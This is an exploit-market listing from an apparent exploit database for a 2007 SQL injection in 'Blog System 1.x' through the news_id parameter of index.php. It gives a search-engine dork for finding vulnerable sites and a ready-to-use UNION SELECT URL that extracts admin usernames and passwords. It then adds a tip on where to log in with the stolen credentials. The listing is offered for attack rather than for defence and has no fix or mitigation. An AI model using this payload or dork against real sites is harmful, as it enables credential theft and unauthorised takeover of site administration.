[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Blog System 1.x (index.php news_id) Remote SQL Injection Vulnerability

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2039
Category
web applications
Date add
19-07-2007
Platform
unsorted
======================================================================
Blog System 1.x (index.php news_id) Remote SQL Injection Vulnerability
======================================================================



--==+================================================================================+==--
--==+              BlogSite Professional SQL Injection Vulnerbility                  +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Browse Blogs by Category"


DESCRIPTION:
pull out admin/members login credentials


EXPLOITS:
http://www.server.com/index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*


NOTE/TIP:
admin login is the normal login on index.php



#  0day.today [2024-09-28]  #